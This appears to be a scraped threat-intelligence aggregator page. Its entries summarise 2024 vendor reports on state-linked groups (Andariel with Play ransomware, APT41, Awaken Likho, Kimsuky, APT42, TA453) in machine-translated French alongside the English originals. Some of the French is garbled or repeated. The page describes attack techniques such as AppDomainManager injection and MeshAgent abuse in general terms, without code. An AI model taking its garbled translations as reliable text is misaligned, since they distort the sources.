Sleet](https://security.microsoft.com/intel-profiles/03ced82eecb35bdb459c47b7821b9b055d1dfa00b56dc1b06f59583bad8833c0))\'s involvement with [Play Ransomware](https://security.microsoft.com/intel-profiles/5052c3d91b03a0996238bf01061afdd101c04f1afb7aeda1fc385a19b4f1b68e) is not definitively clear, as they could be acting as an affiliate or as an Initial Access Broker (IAB) by selling network access to Play ransomware actors. This incident marks a significant development in cyber threats, indicating a convergence of state-sponsored and underground ransomware operations and potentially signaling a trend where North Korean threat groups increasingly participate in global ransomware campaigns. ## Microsoft Analysis and Additional OSINT Context The threat actor that Microsoft tracks as Onyx Sleet is a North Korea-affiliated activity group. First observed by Microsoft in 2014, Onyx Sleet has conducted cyber espionage through numerous campaigns aimed at global targets with the goal of intelligence gathering. More recently, it has expanded its goals to include financial gain. This threat actor operates with an extensive set of custom tools and malware, and regularly evolves its toolset to add new functionality and to evade detection, while keeping a fairly uniform attack pattern. Onyx Sleet\'s ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors. On July 25, 2024, the United States Department of Justice (DOJ) indicted an individual linked to the North Korean threat actor that Microsoft tracks as Onyx Sleet. Microsoft Threat Intelligence collaborated with the Federal Bureau of Investigation (FBI) in tracking activity associated with Onyx Sleet. Onyx Sleet is tracked by other security companies as SILENT CHOLLIMA, Andariel, DarkSeoul, Stonefly, TDrop2, Jumpy Pisces, and APT45. Microsoft tracks campaigns related to Onyx Sleet and directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. Microsoft Defender for Endpoint detects this activity as Onyx Sleet activity group. Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques such as blocking executable files from running unless they meet a prevalence, age, or trusted list criterion, blocking the launch of potentially obfuscated | Ransomware Malware Tool Threat Prediction | APT 45 | ★★ |
|
2024-10-31 15:28:56 | La Corée du Nord \\ a Andariel pivots to \\ 'jouer \\' ransomware jeux North Korea\\'s Andariel Pivots to \\'Play\\' Ransomware Games (lien direct) |
La menace persistante avancée parrainée par l'État (APT), alias Pisces Jumpy, semble s'éloigner de ses principaux motivations de cyber-espionnage et vers des perturbations et des dégâts généralisés.
The prominent state-sponsored advanced persistent threat (APT), aka Jumpy Pisces, appears to be moving away from its primary cyber-espionage motives and toward wreaking widespread disruption and damage. |
Ransomware Threat | APT 45 | ★★ |
|
2024-10-30 21:14:00 | Le groupe nord-coréen collabore avec les ransomwares de jeu dans une cyberattaque importante North Korean Group Collaborates with Play Ransomware in Significant Cyber Attack (lien direct) |
Les acteurs de menace en Corée du Nord ont été impliqués dans un incident récent qui a déployé une famille de ransomwares connue appelée Play, soulignant leurs motivations financières.
L'activité, observée entre mai et septembre 2024, a été attribuée à un acteur de menace suivi comme des Poissons nerveux, qui est également connu sous le nom d'Andariel, APT45, Darkseoul, Nickel Hyatt, Onyx Sleet (anciennement plutonium), opération Troy,
Threat actors in North Korea have been implicated in a recent incident that deployed a known ransomware family called Play, underscoring their financial motivations. The activity, observed between May and September 2024, has been attributed to a threat actor tracked as Jumpy Pisces, which is also known as Andariel, APT45, DarkSeoul, Nickel Hyatt, Onyx Sleet (formerly Plutonium), Operation Troy, |
Ransomware Threat | APT 15 APT 45 | ★★★ |
|
2024-10-21 18:38:00 | Hackers chinois de l'État national APT41 Hit Gambling Sector pour un gain financier Chinese Nation-State Hackers APT41 Hit Gambling Sector for Financial Gain (lien direct) |
L'acteur prolifique de l'État-nation chinois connu sous le nom d'APT41 (AKA Brass Typhoon, Earth Baku, Wicked Panda ou Winnti) a été attribué à une cyberattaque sophistiquée ciblant l'industrie du jeu et du jeu.
"Sur une période d'au moins six mois, les attaquants ont furtivement rassemblé des informations précieuses de la société ciblée, y compris, mais sans s'y limiter, les configurations du réseau, les mots de passe des utilisateurs,
The prolific Chinese nation-state actor known as APT41 (aka Brass Typhoon, Earth Baku, Wicked Panda, or Winnti) has been attributed to a sophisticated cyber attack targeting the gambling and gaming industry. "Over a period of at least six months, the attackers stealthily gathered valuable information from the targeted company including, but not limited to, network configurations, user passwords, |
APT 41 | ★★★ | |
|
2024-10-10 21:13:00 | Analyse technique d'un nouveau cadre IMEEX Technical Analysis of a Novel IMEEX Framework (lien direct) |
#### Géolocations ciblées - Afghanistan - Djibouti ## Instantané Des chercheurs d'Intezer ont publié un rapport détaillant le cadre IMEEX, un logiciel malveillant personnalisé sophistiqué conçu pour cibler les systèmes Windows. ## Description Le cadre IMEEX propose une gamme de fonctionnalités, telles que l'exécution de la commande distante, la manipulation de fichiers, le contrôle des processus et la modification du registre.Livré en tant que DLL 64 bits, il permet aux attaquants de prendre le contrôle total des machines compromises, tandis que ses capacités de reconnaissance collectent les informations critiques du système, qui est envoyée à un serveur de commande et de contrôle (C2).Les capacités d'Imeex \\ en font un outil puissant pour le contrôle du système distant, en utilisant une approche modulaire qui lui permet de charger et d'exécuter des composants à la demande, améliorant sa flexibilité. IMEEX a été identifié principalement dans Djibouti, avec une variante moins capable vue en Afghanistan.Cependant, Intezer évalue que la campagne ne se limite probablement pas uniquement à ces pays. Le malware est conçu pour la furtivité, se mélangeant à des processus système légitimes comme Svchost.exe et en utilisant une communication cryptée pour éviter la détection.Il utilise diverses techniques de persistance, telles que la modification des clés de registre et l'utilisation de mutex pour empêcher plusieurs instances. Notamment, la campagne IMEEX observée réutilise l'infrastructure précédemment observée distribuant [ShadowPad] (https://security.microsoft.com/intel-profiles/shadowpad), une plate-forme malware modulaire utilisée par les acteurs chinois de la menace, suggérant des liens possibles entre ces campagnes.Cependant, Intezer n'est pas en mesure d'attribuer en toute confiance l'activité pour le moment. Intezer note que IMEEX a été principalement déployé dans les régions de signification géopolitique, Djibouti et l'Afghanistan étant des domaines clés en raison de leur importance stratégique pour le commerce et la sécurité mondiales.La société évalue que les intérêts de la Chine dans les deux pays suggèrent que les logiciels malveillants comme IMEEX soient utilisés comme outil d'espionnage et de maintien de l'influence sans conflit direct. ## Analyse Microsoft Shadowpad est une porte dérobée modulaire identifiée par Kapersky en 2017, bien que les chercheurs aient souligné que des échantillons datant de 2015. Les preuves de ShadowPad dans votre réseau devraient susciter une réponse élevée en raison de son utilisation historique dans les attaques de la chaîne d'approvisionnement soutenue par le gouvernement.Le chef d'entre eux sont le [compromis de logiciel de gestion de serveur NetSarang 2017] (https://www.csoonline.com/article/562645/kaspersky-discovers-supply-chain-attack-at-netsarang.html) et [2017-2018Compromis du populaire Ccleaner d'Avast \\] (https://www.wired.com/story/inside-the-unnerving-supply-chain-attack- that-corrupted-cleaner/), à la fois le travail de chinois avancé persistant persistant persistantGroupes de menace (APT). Microsoft Threat Intelligence a observé des acteurs de menaces chinoises en tirant parti de ShadowPad pour maintenir un accès persistant et exfiltrer les données des environnements victimes.Par exemple, le thrEat Actor Microsoft suit comme [Storm-0147] (https://security.microsoft.com/intel-profiles/de13fce840ca95805ab1e06edb35a9b2a87faf1226230cbd36c3231727087d64), a ChinUn groupe de cyber-espionnage basé, a été observé en tirant parti de ShadowPad dans un certain nombre de ses attaques.Le groupe est connu pour cibler principalement les agences gouvernementales, les groupes de réflexion, les entités agricoles et les entités minières en Asie centrale et du Sud-Est, dans la région du Pacifique et en Amérique du Sud.Certains des activités du groupe se chevauchent avec au moins deux autres groupes d'activités basés sur | Ransomware Malware Tool Threat Technical | APT 41 | ★★ |
|
2024-10-08 05:14:51 | Awaken Likho is awake: new techniques of an APT group (lien direct) | #### Géolocations ciblées - Russie ## Instantané Des chercheurs de Kaspersky ont identifié une campagne par le groupe APT Awaken Likho, également connu sous le nom de Core Werewolf, ciblant les agences gouvernementales russes et les entreprises industrielles. ## Description La campagne, active de juin à au moins août 2024, a marqué un changement de tactique, le groupe utilisant désormais Meshagent, un agent de la plate-forme Meshcentral légitime, au lieu de leur module Ultravnc précédemment utilisé pour l'accès à distance du système.L'implant a été livré via une URL malveillante, probablement des e-mails de phishing, et a été emballé dans une archive auto-extraite à l'aide de UPX. La chaîne d'attaque comprenait un script AutOIT exécutant deux fichiers, NetworkDrivers \ [. \] EXE et NKKA9A82KJN8KJHA9 \ [. \] CMD, pour assurer la persistance.NetworkDrivers \ [. \] EXE est un maillant qui interagit avec le serveur C2, tandis que le script CMD NKKA9A82KJN8KJHA9 \ [. \] Fortement obscurci crée une tâche planifiée nommée MicrosoftepDatDateTaskMachinems, qui exécute EdgeBrowser.CMD et Deletes traces de l'attaque.Les attaquants ont également utilisé un fichier de configuration, NetworkDrivers \ [. \] MSH, pour que Meshagent établisse une connexion avec le serveur Meshcentral. Sur la base des tactiques, des techniques et des procédures (TTPS) utilisées, de la victiologie et de l'évolution de leurs méthodes, Kaspersky attribue ces attaques pour éveiller likho.Le groupe est actif depuis le début du conflit russo-ukrainien et continue d'évoluer ses méthodes, indiquant que leur malware est toujours en développement et que d'autres attaques sont probables. ## Analyse Microsoft Meshagent est un Source ouverte [outil de gestion à distance] (https://security.microsoft.com/intel-explorer/articles/9782a9ef) qui a été exploité par divers acteurs de menace pour obtenir un accès non autorisé aux victimes \\ ''.Il peut collecter des informations système essentielles pour la gestion à distance et propose des fonctionnalités telles que la gestion de l'alimentation et du compte, le chat ou les fenêtres contextuelles de message, le transfert de fichiers et l'exécution des commandes.De plus, il prend en charge les capacités de bureau à distance basées sur le Web telles que RDP et VNC.Bien que les utilisateurs puissent utiliser cet outil de gestion légitime du système à distance, ces fonctionnalités sont également très attrayantes pour les acteurs malveillants.Par exemple, en mai, [Cisco Talos a rapporté] (https://security.microsoft.com/intel-explorer/articles/39e87f2a) sur une campagne de vol de données utilisant Meshagent avec Quaserrat pour compromettre des serveurs d'application vulnérables exposés à Internet.Et en mars, [Ahnlab Security Intelligence Center (ASEC) a rapporté] (https://asec.ahnlab.com/en/63192/) sur le groupe Andariel parrainé par l'État exploitant Meshagent pour cibler les solutions de gestion des actifs coréens. ## Recommandations Microsoft recommande les atténuations suivantes pour réduire l'impact de cette menace.Vérifiez la carte de recommandations pour l'état de déploiement des atténuations surveillées. - Passez en revue notre profil technique sur [Abus de surveillance à distance et d'outils de gestion] (https://security.microsoft.com/intel-explorer/articles/9782a9ef) pour bloquer et chasser des outils comme Meshagent. - Pilot et déploie [méthodes d'authentification résistantes à la phishing pour les utilisateurs.] (Https://learn.microsoft.com/en-us/entra/identity/authentication/concept-authentication-methods?ocid=Magicti_ta_learndoc) - Configurez Microsoft Defender pour Office 365 à [Rechercher les liens sur Click] (https://learn.microsoft.com/en-us/defender-office-365/safe-links-about?ocid=Magicti_TA_LearnDoc).Safe Links fournit une analyse et une réécriture des URL des e-mails entrants dans le flux de messagerie et une vérification du temps de clic des URL et | Malware Tool Threat Industrial | APT 45 | ★★★ |
|
2024-10-07 16:54:11 | Faits saillants hebdomadaires OSINT, 7 octobre 2024 Weekly OSINT Highlights, 7 October 2024 (lien direct) |
## Snapshot Last week\'s OSINT reporting highlights diverse and sophisticated attack tactics, primarily focusing on nation-state actors, cybercriminal groups, and advanced malware campaigns. Common attack vectors include spear-phishing, exploiting vulnerabilities (such as CVEs in Linux servers and AI infrastructure), and malware delivered through fileless methods. The malware ranges from Joker\'s subscription fraud (targeting mobile devices) to more complex backdoors like WarmCookie, which allows system profiling and further malware deployment. North Korean APT groups (APT37 and Stonefly) remain active, targeting Southeast Asia and United States companies, while Iranian actors focus on political campaigns. Financially motivated attacks are also prominent, with ransomware groups like Meow and attackers using MedusaLocker deploying advanced techniques for exfiltration and encryption. Cloud environments and AI infrastructure, including generative models like AWS Bedrock, have emerged as critical targets, exposing new vulnerabilities for resource hijacking and illicit services. ## Description 1. [Golden Chickens\' More_Eggs](https://sip.security.microsoft.com/intel-explorer/articles/4cb94d70): Trend Micro discovered the use of the more\_eggs backdoor in spear-phishing attacks, targeting various industries. Recent campaigns involved advanced social engineering, and while attribution remains unclear, there are possible ties to FIN6 (Storm-0538). 2. [Linux Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/68e49ad7): Elastic Security Labs uncovered a Linux malware campaign using KAIJI for DDoS attacks and RUDEDEVIL for cryptocurrency mining. The attackers exploited Apache2 vulnerabilities and used Telegram bots for communication and persistence. 3. [Rhadamanthys Malware Updates](https://sip.security.microsoft.com/intel-explorer/articles/c9ea8588): Recorded Future reported on the evolving Rhadamanthys information-stealing malware, now incorporating AI-driven OCR for cryptocurrency theft. It targets systems in North and South America, leveraging encryption and advanced defense evasion techniques. 4. [NVIDIA Container Toolkit Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a35e980e): Wiz Research discovered a critical vulnerability (CVE-2024-0132) in the NVIDIA Container Toolkit, exposing cloud and AI environments to container escape attacks. This flaw could lead to unauthorized control over host systems and data exfiltration. 5. [K4Spreader and PwnRig Campaign](https://sip.security.microsoft.com/intel-explorer/articles/416b07c0): Sekoia TDR linked a campaign exploiting WebLogic vulnerabilities to the 8220 Gang, deploying the K4Spreader malware and PwnRig cryptominer. The attackers primarily target cloud environments for Monero mining, exploiting both Linux and Windows systems. 6. [Nitrogen Malware Incident](https://sip.security.microsoft.com/intel-explorer/articles/d0473059): The DFIR Report analyzed an attack using Nitrogen malware delivered through a malicious Advanced IP Scanner installer. The threat actor used Sliver and Cobalt Strike beacons, eventually deploying BlackCat ransomware across the victim\'s network. 7. [Gorilla Botnet\'s DDoS Attacks](https://sip.security.microsoft.com/intel-explorer/articles/0bcef023): NSFOCUS identified the Gorilla Botnet, a Mirai variant, launching over 300,000 DDoS attacks. Its primary targets were U.S., Chinese, and global sectors, including government and telecom, using advanced encryption techniques for stealth. 8. [Iranian IRGC Cyber Activity](https://sip.security.microsoft.com/intel-explorer/articles/42850d7b): The FBI and UK\'s NCSC warned about Iranian IRGC-affiliated actors targeting individuals related to Middle Eastern affairs. Using social engineering, they focused on stealing credentials and influencing U.S. political campaigns. 9. [Critical Infrastructure Reconnaissance](https://sip.security.microsoft.com/intel-explorer/articles/d491ff08): Dragos detected a campaign targeting North Ame | Ransomware Malware Tool Vulnerability Threat Mobile Prediction Cloud | APT 37 APT 45 | ★★ |
|
2024-09-26 17:58:00 | Les pirates coréens de N. déploient de nouveaux logiciels malveillants Klogexe et FPSPy dans des attaques ciblées N. Korean Hackers Deploy New KLogEXE and FPSpy Malware in Targeted Attacks (lien direct) |
Des acteurs de menaces avec des liens avec la Corée du Nord ont été observés en tirant parti de deux nouvelles souches de logiciels malveillants surnommée Klogexe et FPSPY.
L'activité a été attribuée à un adversaire suivi comme Kimsuky, qui est également connu sous le nom d'APT43, d'archipel, de banshee noir, de grésil émeraude (ancien thallium), de Poissons scintillants, de chollima à la queue de ressort et de velours.
"Ces échantillons améliorent les Poissons mousseux \\ 'Arsenal déjà étendu
Threat actors with ties to North Korea have been observed leveraging two new malware strains dubbed KLogEXE and FPSpy. The activity has been attributed to an adversary tracked as Kimsuky, which is also known as APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (formerly Thallium), Sparkling Pisces, Springtail, and Velvet Chollima. "These samples enhance Sparkling Pisces\' already extensive arsenal |
Malware Threat | APT 43 | ★★ |
|
2024-09-20 01:00:00 | Nord-Coréen APT contourne les politiques de courrier électronique du DMARC dans les attaques de cyber-espionnage North Korean APT Bypasses DMARC Email Policies in Cyber-Espionage Attacks (lien direct) |
Comment le groupe de l'État-nation de Kimsuky et d'autres acteurs de menace exploitent une mauvaise sécurité des e-mails - et ce que les organisations peuvent faire pour se défendre.
How the Kimsuky nation-state group and other threat actors are exploiting poor email security - and what organizations can do to defend themselves. |
Threat | APT 43 | ★★★★ |
|
2024-09-02 19:54:58 | Faits saillants hebdomadaires OSINT, 2 septembre 2024 Weekly OSINT Highlights, 2 September 2024 (lien direct) |
## Instantané La semaine dernière, les rapports OSINT de \\ ont mis en évidence un ensemble diversifié de cybermenaces et de méthodologies d'attaque dans plusieurs secteurs et géographies.Les principales tendances comprenaient la sophistication croissante des campagnes de phishing, telles que celles qui tirent parti des logiciels malveillants multiplateformes comme le voleur Cheana et des tactiques innovantes comme le quai via des codes QR.Le déploiement de balises de Cobaltsstrike, les techniques d'injection du gestionnaire de l'Appdomain et l'abus de services légitimes comme Microsoft Sway, les tunnels Cloudflare et les outils de gestion à distance ont également présenté en bonne place, soulignant l'évolution de la boîte à outils des cybercriminels et des acteurs parrainés par l'État.Les entités ciblées s'étendaient sur des industries, notamment les finances, le gouvernement, les soins de santé et les infrastructures critiques, les attaquants utilisant fréquemment des mécanismes de persistance avancés, exploitant des vulnérabilités zéro-jours et en utilisant des ransomwares dans des schémas à double extorsion. ## Description 1. [Utilisateurs coréens ciblés avec des logiciels malveillants à distance] (https://sip.security.microsoft.com/intel-explorer/articles/b920e285): Ahnlab Security Intelligence Center (ASEC) a découvert une cyberattaque ciblant les utilisateurs coréens, où un inconnu Intelligence Center (ASEC) a découvert une cyberattaque ciblant les utilisateurs coréens, où un inconnu Intelligence Center (ASEC) a découvert une cyberattaque ciblant les utilisateurs coréens, où un inconnu Intelligence Center (ASEC) a découvert une cyberattaque ciblant les utilisateurs coréens, lorsqu'un inconnuL'attaquant a déployé des logiciels malveillants à distance, y compris l'asyncrat, et des délais personnalisés comme FXFDOOR et NOMU.L'attaque, potentiellement liée au groupe nord-coréen Kimsuky, s'est concentrée sur le vol d'informations, avec un spearphishing et des vulnérabilités dans IIS et MS Exchange comme points d'entrée possibles. 2. [Campagne de phishing déguisée en sondage RH cible Office 365 Contaliens] (https://sip.security.microsoft.com/intel-explorer/articles/9431aa5a): les chercheurs de Cofense ont identifié une attaque de phishing qui s'est présentée comme un engagement en milieu d'annéeEnquête pour voler les informations d'identification Microsoft Office 365.L'attaque a utilisé un faux e-mail RH réalisant des destinataires vers une page hébergée par Wufoo, conduisant finalement à une page de connexion frauduleuse Microsoft conçue pour récolter les informations d'identification. 3. [Campagne de phishing multiplateforme avec Cheana Stealer] (https://sip.security.microsoft.com/intel-explorer/articles/69d7b49e): Cyble Research and Intelligence Lab (CRIL) a découvert une campagne de phishing ciblant les fenêtres, Linuxet les utilisateurs de macOS avec Cheana Stealer malware, distribué via un site imitant un fournisseur VPN.Les logiciels malveillants visaient à voler des portefeuilles de crypto-monnaie, des mots de passe du navigateur et des clés SSH, en tirant parti d'un canal télégramme pour une distribution généralisée, mettant en évidence les attaquants \\ 'se concentrer sur le compromis de divers systèmes. 4. [Vulnérabilité zéro-jour dans Versa Director exploité par APT] (https://sip.security.microsoft.com/intel-explorer/articles/1af984be): Versa Networks a identifié une vulnérabilité zéro-jour (CVE-2024-39717) Dans le directeur de l'interface graphique de Versa, exploité par un acteur apt pour télécharger des fichiers malveillants déguisés en images PNG.L'attaque a été facilitée par un mauvais durcissement du système et des ports de gestion exposés, ciblant les clients qui n'ont pas réussi à sécuriser correctement leur environnement. 5. [Mallox Ransomware Exploits Cloud Misconfiguration](https://sip.security.microsoft.com/intel-explorer/articles/d9af6464): Trustwave investigated a Mallox | Ransomware Malware Tool Vulnerability Threat Mobile Medical Cloud | APT 41 APT 32 | ★★ |
|
2024-08-30 16:45:00 | Les pirates iraniens ont mis en place un nouveau réseau pour cibler les campagnes politiques américaines Iranian Hackers Set Up New Network to Target U.S. Political Campaigns (lien direct) |
Les chercheurs en cybersécurité ont mis au jour de nouvelles infrastructures de réseau créées par les acteurs iraniens de la menace pour soutenir les activités liées au ciblage récent des campagnes politiques américaines.
Enregistré Future \'s Insikt Group a lié l'infrastructure à une menace qu'il suit en tant que Greencharlie, un groupe de cyber-menace Iran-Nexus qui chevauche l'APT42, le chaton charmant, le chemin de la menthe, la menthe Sandstorm (anciennement
Cybersecurity researchers have unearthed new network infrastructure set up by Iranian threat actors to support activities linked to the recent targeting of U.S. political campaigns. Recorded Future\'s Insikt Group has linked the infrastructure to a threat it tracks as GreenCharlie, an Iran-nexus cyber threat group that overlaps with APT42, Charming Kitten, Damselfly, Mint Sandstorm (formerly |
Threat | APT 35 APT 42 | ★★★ |
|
2024-08-30 15:08:41 | I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation (lien direct) | #### Géolocations ciblées
- Israël
## Instantané
Mandiant a divulgué les détails d'une campagne de contre-espionnage soupçonnée d'être liée à l'Iran, ciblant les Iraniens et les menaces domestiques perçues qui peuvent collaborer avec des agences de renseignement étrangères, en particulier celles d'Israël.
## Description
L'opération vise à recueillir des données personnelles et professionnelles, aidant potentiellement l'intelligence iranienne dans l'identification des collaborateurs avec les adversaires de l'Iran et le suivi des activités de l'intelligence humaine (Humint) contre l'Iran.La campagne cible probablement les dissidents iraniens, les militants et les locuteurs du FARSI à l'intérieur et à l'extérieur de l'Iran.
Mandiant attribue la campagne à l'Iran avec une grande confiance en raison de ses tactiques, techniques et procédures (TTPS).Maniant Asses Il y a un certain chevauchement avec APT42, un groupe de cyber-espionnage iranien connu associé à l'organisation de renseignement du Guard Révolutionnaire islamique (IRGC).
La campagne diffuse plus de 35 faux sites de recrutement via les médias sociaux, se faisant passer pour des entreprises de ressources humaines israéliennes pour attirer des cibles à fournir des informations sensibles.L'opération est active depuis au moins 2017 et est parallèle aux efforts précédents ciblant les arabes orateurs liés à la Syrie et au Hezbollah, suggérant une stratégie de contre-espionnage plus large.
## références
[J'espionne avec mon petit œil: découvrir une opération de contre-espionnage iranienne] (https://cloud.google.com/blog/topics/thereat-intelligence/uncovening-iranian-counterintelligence-operation/).Mandiant (consulté en 2024-08-29)
## Copyright
**&copie;Microsoft 2024 **.Tous droits réservés.La reproduction ou la distribution du contenu de ce site, ou de toute partie de celle-ci, sans l'autorisation écrite de Microsoft est interdite.
#### Targeted Geolocations - Israel ## Snapshot Mandiant has disclosed details of a counterintelligence campaign suspected to be linked to Iran, targeting Iranians and perceived domestic threats who may collaborate with foreign intelligence agencies, especially those in Israel. ## Description The operation aims to gather personal and professional data, potentially aiding Iranian intelligence in identifying collaborators with Iran\'s adversaries and tracking human intelligence (HUMINT) activities against Iran. The campaign likely targets Iranian dissidents, activists, and Farsi speakers both inside and outside Iran. Mandiant attributes the campaign to Iran with high confidence due to its tactics, techniques, and procedures (TTPs). Mandiant asseses there is some overlap with APT42, a known Iranian cyber-espionage group associated with the Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization. The campaign disseminates over 35 fake recruitment websites via social media, posing as Israeli human resources firms to lure targets into providing sensitive information. The operation has been active since at least 2017 and has parallels with previous efforts targeting Arabic speakers linked to Syria and Hezbollah, suggesting a broader counterintelligence strategy. ## References [I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation](https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/). Mandiant (accessed 2024-08-29) ## Copyright **© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited. |
Cloud | APT 42 | ★★★ |
|
2024-08-28 20:46:51 | Les pirates utilisent désormais l'injection d'appdance pour laisser tomber les balises de Cobaltstrike Hackers now use AppDomain Injection to drop CobaltStrike beacons (lien direct) |
#### Géolocations ciblées - Taiwan - Vietnam - Philippines ## Instantané Des chercheurs de NTT ont identifié une vague d'attaques à partir de juillet 2024 qui exploitent la technique de l'injection du gestionnaire d'Appdomain qui a été inhabituellement observée dans la nature.Les attaques ont ciblé les agences gouvernementales à Taïwan, les militaires aux Philippines et les organisations énergétiques au Vietnam. ## Description Les attaques culminent dansDéploiement d'un [CobaltStrike] (https://security.microsoft.com/intel-profiles/fd8511c1d61e93d39411acf36a31130a6795efe186497098fe0c6f2ccfb920fc)Beacon, et il y a des indications de chevauchement avec les récents rapports AHNLAB, suggérant l'implication du groupe de menaces parrainé par l'État chinois, APT 41, bien que cette attribution ait une faible confiance.La technique d'injection du gestionnaire AppDomain exploite la classe AppDomainManager .NET Framework de. Les attaques observées par NTT commencent par la livraison d'une archive zip contenant un fichier MSC malveillant, qui exploite une vulnérabilité de script de sites croisées (XSS) dans la bibliothèque APDS.DLL de Windows pour exécuter du code arbitraire via Microsoft Management Console (MMC) en utilisantFichiers .MSC spécialement conçus.Ces fichiers .msc tirent parti de la technique GrimResource, ce qui permet l'exécution automatique des scripts lorsqu'un fichier est ouvert, éliminant le besoin d'interaction utilisateur.Cela conduit finalement au chargement d'une balise de Cobaltsstrike sur la machine, permettant un large éventail d'actions malveillantes.Selon NTT, la combinaison des techniques d'injection et de grimresource du gestionnaire d'Appdomain indique que les attaquants ont l'expertise technique pour utiliser des techniques nouvelles et moins connues dans des cas pratiques. ## Analyse Microsoft Les fichiers de console enregistrés (.MSC) de gestion sont utilisés pour stocker des configurations pour Microsoft Management Console (MMC), mais ils pourraient être abusés par les acteurs de la menace pour lancer un code malveillant.Microsoft Threat Intelligence a observé les acteurs de la menace [Emerald Sleet] (https://security.microsoft.com/intel-profiles/f1e214422dcaf4fb337dc703ee4ed596d8ae16f942f442b895752ad9f41dd58e) et [twill] (htypho urity.microsoft.com/intel-profiles/01aef6bb1a4cd12178aca7fceb848002164b83bf375fa33699ed4c5523b4fd3c) Utilisation de cette technique comme vecteur d'accès initial pour déployer des fichiers malveillants sur des appareils cibler.D'autres acteurs de menace ont déployé des logiciels malveillants tels que la grève de Cobalt en utilisant une technique que les chercheurs appelle GrimResource, qui fait référence à un fichier .MSC spécialement conçu qui utilise un défaut de script de site croisé (XSS) trouvé dans APDS.dll pour exécuter du code à l'aide de MMC. Microsoft Defender Antivirus détecte GrimResource et MALWORED déployé par ces fichiers .MSC malveillants.Lors de l'ouverture d'un fichier .msc téléchargé depuis Internet ou joint à un e-mail, un utilisateur doit accepter une invite d'avertissement de sécurité que le fichier .msc est lancé.Les organisations peuvent se défendre davantage contre cette technique en tirant parti des règles de réduction de la surface d'attaque pour limiter les types d'exécutables autorisés à s'exécuter dans votre environnement. En savoir plus sur la façon dont les acteurs de menace utilisent [les fichiers MMC pour fournir des logiciels malveillants] (https://security.microsoft.com/intel-explorer/articles/5b8609f0). ## Détections / requêtes de chasse ### Microsoft Defender Antivirus Microsoft DL'antivirus Efender détecte les composants de menace comme le malware suivant: - Trojan: XML / GRIMSOURCE.B - TrojandRopper: JS / GRIMRESOURCE.C Microsoft a observé une activité post-compromise avec les détections antivirus suivantes: - [Trojan: WIn64 / cobaltsstrike.qf] (htt | Ransomware Malware Tool Vulnerability Threat Technical | APT 41 | ★★★ |
|
2024-08-28 14:00:00 | J'espionne avec mon petit œil: découvrir une opération de contre-espionnage iranienne I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation (lien direct) |
Written by: Ofir Rozmann, Asli Koksal, Sarah Bock
Today Mandiant is releasing details of a suspected Iran-nexus counterintelligence operation aimed at collecting data on Iranians and domestic threats who may be collaborating with intelligence and security agencies abroad, particularly in Israel. The data collected by this campaign may support the Iranian intelligence apparatus in pinpointing individuals who are interested in collaborating with Iran\'s perceived adversarial countries. The collected data may be leveraged to uncover human intelligence (HUMINT) operations conducted against Iran and to persecute any Iranians suspected to be involved in these operations. These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran. Mandiant assesses with high confidence this campaign was operated on behalf of Iran\'s regime, based on its tactics, techniques, and procedures (TTPs), themes, and targeting. In addition, we observed a weak overlap between this campaign and APT42, an Iran-nexus threat actor suspected to operate on behalf of Iran\'s IRGC Intelligence Organization (IRGC-IO). This campaign\'s activities are in line with Iran\'s IRGC and APT42\'s history of conducting surveillance operations against domestic threats and individuals of interest to the Iranian government. Despite the possible APT42 connection, Mandiant observed no relations between this activity and any U.S. elections-related targeting as previously reported by Google\'s Threat Analysis Group. The activity used multiple social media accounts to disseminate a network of over 35 fake recruiting websites containing extensive Farsi decoy content, including job offers and Israel-related lures, such as images of Israeli national symbols, hi-tech offices, and major city landmarks. Upon entry, the targeted users are required to enter their personal details as well as their professional and academic experience, which are subsequently sent to the attackers. The suspected counterintelligence operations started as early as 2017 and lasted at least until March 2024. In the past, similar campaigns were deployed in Arabic, targeting individuals affiliated with Syria and Hezbollah intelligence and security agencies. This may indicate Iran\'s counterintelligence activities extend beyond its own security and intelligence apparatus, possibly in support of its allies in Syria and Lebanon. Mandiant worked to help ensure this activity was blocked and disrupted, the threat actor\'s accounts were terminated, and Google Chrome users and the users of other browsers were protected. |
Threat Mobile Cloud | APT 42 | ★★★★ |
|
2024-08-26 21:33:17 | Les pirates utilisent de rares techniques furtives pour réduire les militaires asiatiques, Gov \\ 't orgs Hackers Use Rare Stealth Techniques to Down Asian Military, Gov\\'t Orgs (lien direct) |
Un acteur de menace ressemblant à APT41 a effectué une "injection d'appdance de manain", qui est comme une charge de touche de la DLL, mais sans doute plus facile et plus furtive.
A threat actor resembling APT41 performed "AppDomainManager Injection," which is like DLL sideloading, but arguably easier and stealthier. |
Threat | APT 41 | ★★ |
 |
2024-08-20 05:00:25 | Meilleurs plans posés: TA453 cible la figure religieuse avec un faux podcast invite livrant un nouvel ensemble d'outils de logiciel malveillant forgeron Best Laid Plans: TA453 Targets Religious Figure with Fake Podcast Invite Delivering New BlackSmith Malware Toolset (lien direct) |
Key findings Proofpoint identified Iranian threat actor TA453 targeting a prominent religious figure with a fake podcast interview invitation. The initial interaction attempted to lure the target to engage with a benign email to build conversation and trust to then subsequently click on a follow-up malicious link. The attack chain attempted to deliver a new malware toolkit called BlackSmith, which delivered a PowerShell trojan dubbed AnvilEcho by Proofpoint. The malware, which uses encryption and network communication techniques similar to previously observed TA453 samples, is designed to enable intelligence gathering and exfiltration. AnvilEcho contains all of TA453\'s previously identified malware capabilities in a single PowerShell script rather than the modular approach previously observed. Overview Starting 22 July 2024, TA453 contacted multiple email addresses for a prominent Jewish figure while pretending to be the Research Director for the Institute for the Study of War (ISW). The lure purported to invite the target to be a guest on a podcast hosted by ISW. After receiving a response from the target (outside of Proofpoint visibility), TA453 replied with a DocSend URL. The DocSend URL was password protected and led to a text file that contained a URL to the legitimate 